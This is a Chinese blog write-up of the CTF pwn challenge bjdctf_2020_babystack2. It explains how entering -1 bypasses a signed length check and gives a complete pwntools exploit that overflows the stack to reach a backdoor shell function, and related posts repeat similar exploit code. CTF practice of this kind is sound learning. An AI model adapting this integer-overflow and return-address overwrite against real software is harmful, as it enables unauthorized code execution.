bjdctf_2020_babystack2

最新推荐文章于 2024-05-13 18:34:53 发布
最新推荐文章于 2024-05-13 18:34:53 发布
阅读量415 收藏
点赞数
分类专栏: BUU-PWN 文章标签: CTF pwn WriteUp python 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0sway/article/details/123961629
版权

bjdctf_2020_babystack2

使用checksec查看:
在这里插入图片描述
只开启了栈不可执行。

先放进IDA中分析:
在这里插入图片描述

  • __isoc99_scanf("%d", &nbytes);:用户输入第二次输入的长度。
  • read(0, &buf, (unsigned int)nbytes);:向变量buf内读取用户第一次输入长度大小的数据。

存在backdoor()
在这里插入图片描述

  • 直接getshell,调用即可。

题目思路

  • -1绕过长度限制。
  • 覆盖返回地址为backdoor()的地址。

步骤解析

无需

完整exp

from pwn import *

#start
r = remote("node4.buuoj.cn",27324)
# r = process("../buu/bjdctf_2020_babystack2")
elf = ELF("../buu/bjdctf_2020_babystack2")

#params
backdoor_addr = elf.symbols['backdoor']

#attack
r.recv()
r.sendline(b"-1")
r.recv()
payload = b'M'*(0x10+8) + p64(backdoor_addr)
r.sendline(payload)

r.interactive()
m0sway
关注
专栏目录
BUUCTFbjdctf_2020_babystack2(write up)
qq_44768749的博客
08-24 1606
BUUCTFbjdctf_2020_babystack20x01文件分析0x02 运行0x03 IDA0x04 思路0x05 exp 0x01文件分析 64位程序,开启了栈不可执行、部分RELRO保护 0x02 运行 先输入name的长度,再输入name 0x03 IDA 输入nbytes的长度要小于10 同时给出了后面函数直接getshell 0x04 思路 比较nbytes和10的大小,可以利用符号溢出漏洞,输入一个负数,进而输入name的时候可以实现栈溢出跳转到后门函数ge
buu bjdctf_2020_babystack2 整数溢出、栈溢出
qq_41849152的博客
09-14 200
整数溢出、栈溢出
CTFbjdctf_2020_babystack2
凉水的博客
06-30 643
bjdctf_2020_babystack2
bjdctf_2020_babystack2【BUUCTF
qq_41696518的博客
08-31 821
bjdctf_2020_babystack2【BUUCTF
bjdctf_2020_babystack
m0_52231248的博客
11-07 97
bjdctf_2020_babystack 题目Ubuntu 16 Checksec检查一下 Ida: read函数的读取长度是我们的输入,存在溢出点,offest=0x10+0x8 然后main函数上面就是backdoor函数 构造exp: 成功得到flag:
日行一PWN bjdctf_2020_babystack 尝试动态调试?
m0_57221101的博客
06-02 470
BUUCTF在线评测 (buuoj.cn)还是buu的题,这次没什么好讲的,一道送分题,但是明白了一个道理,不要太相信ida 的伪代码,那玩意的作用是帮你快速看明白题是在干什么,而不是帮你弄清楚做出这道题的细节。尤其是数据长度部分那么直接来分析首先可以看到,只有NX,和部分RELRO保护ida静态分析也是非常干脆的给出了后门程序主函数更是简单,用scanf来输入一个数字,把这个数字作为我们之后再read中的数据MAX大小。而看上面的接收参数只有0x10个大小(看伪代码此处说只有十二个,其实有16个,非常折磨
BUUCTF pwn水题大赏(三)
o琦野o的博客
02-03 386
BUUCTF pwn水题大赏21.铁人三项(第五赛区)_2018_rop22.bjdctf_2020_babyrop23.[BJDCTF 2nd]r2t424.[BJDCTF 2nd]test25.bjdctf_2020_babystack226.bjdctf_2020_babyrop227.bjdctf_2020_router28.others_babystack29.ciscn_2019_s_430.wdb2018_guess 21.铁人三项(第五赛区)_2018_rop 32位栈溢出,利用 write
【BUUCTFbjdctf_2020_babystack2
m0_51251108的博客
12-30 336
【BUUCTFbjdctf_2020_babystack2 64位,无canary 有后门函数 这题思路就是用无符号和有符号整型来绕过10的比较 比如:送入一个-1,无符号类型会把它看成一个很大的正整数,是,而有符号则认为是-1 这题size_t是一种无符号整型,下面被强转成有符号,最后又强转成无符号 所以可以绕过 exp: from pwn import* r=remote('node3.buuoj.cn',29907) context.log_level = 'debug' backdoor=0
bjdctf 2020 babystack2
pondzhang的专栏
05-19 247
from pwn import * p = process('./bjdctf_2020_babystack2') p.sendlineafter("length of your name:\n","-1") payload = 24*'a'+ p64(0x0000000000400893) + p64(0) + p64(0x0000000000400726) p.sendlineafter("name?\n",payload) p.interactive()
[BUUCTF]PWN——bjdctf_2020_babystack2
mcmuyanga的博客
11-03 636
bjdctf_2020_babystack2 附件 步骤: 例行检查,64位程序,开启了nx保护 尝试运行一下程序,看看情况 64位ida载入,习惯性的先检索程序里的字符串,发现了bin/sh,双击跟进,找到了程序里的后门函数,backdoor=0x400726 从main函数开始看程序 我们读入数据的大小由我们输入的参数nbytes控制,但是nbytes又不能大于10,这边注意到了nbytes参数的类型–>size_t 百度百科里对这个类型的解释是 大概就是一个无符号整型,注意重点是无符
BUU刷题-Pwn-bjdctf_2020_babystack2
一个啥也不会的小菜鸡!
06-21 168
因此可以输入0x80000001=>2147483649,signed int类型被当做负数小于10,read函数中unsigned int类型被当成正整数2147483649。比较nbytes和10的大小,可以利用无符号整数溢出漏洞,输入一个负数,进而输入name的时候可以实现栈溢出跳转到后门函数getshell。nbytes是signed int类型,4字节,但后面read函数输入name时却是unsigned int类型。
[BJDCTF 2020]babystack2.0 CTF-PWN
最新发布
m0_72904009的博客
05-13 260
[BJDCTF 2020]babystack2.0 CTF-PWN
[BUUOJ]bjdctf_2020_babystack2
Do1phln的博客
10-25 159
checksec是64位小端序,IDA分析看没找到明显的输入溢出逻辑,但是找到了后门函数,再仔细观察发现数值里面有强制转换,有一部分从int转到了unsigned int,因此可以初步判定为整型溢出,如果我输入-1即可突破长度为10的限制,所以以此下手即可成功修改返回地址,getshell。
[BUUCTF-pwn]——bjdctf_2020_babystack2
Y_peak的博客
02-22 228
[BUUCTF-pwn]——bjdctf_2020_babystack2 题目地址: https://buuoj.cn/challenges#bjdctf_2020_babystack2 先checksec一下 在IDA中查看一下,注意想要栈溢出,首先需要nbytes足够大。size_t类型在标准C语言库中,是unsigned int类型, 64位 long unsigned int。 而%d 是按照int类型读取的,我们读入-1。其实就相当于一个很大的数字,但是可以绕过检查。具体可以了解下整型溢出
BUUCTF pwn——bjdctf_2020_babystack2
CNS-Enterprise BCC-1701-J
04-12 151
BUUCTF 做题练习
PWN · IntegerOverflow & ret2text】[BJDCTF 2020]babystack2.0
Mr_Fmnwon的博客
05-27 1107
整数溢出漏洞——对于有/无符号数,长/短位宽转换时机器码的变换策略所指。整数溢出一般与其他堆栈溢出相结合,然而其中的内容其实远不止这些,还需要深层次刷题,进一步掌握了解整数溢出。
[BJDCTF2020]RSA
08-11
RSA(Rivest-Shamir-Adleman)是一种非对称加密算法,常用于数据加密和数字签名。...在BJDCTF2020中,RSA可能是一个题目或者提到的某个技术细节。若有具体问题或需要更多信息,请提供详细内容以便我能够帮助你更好。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值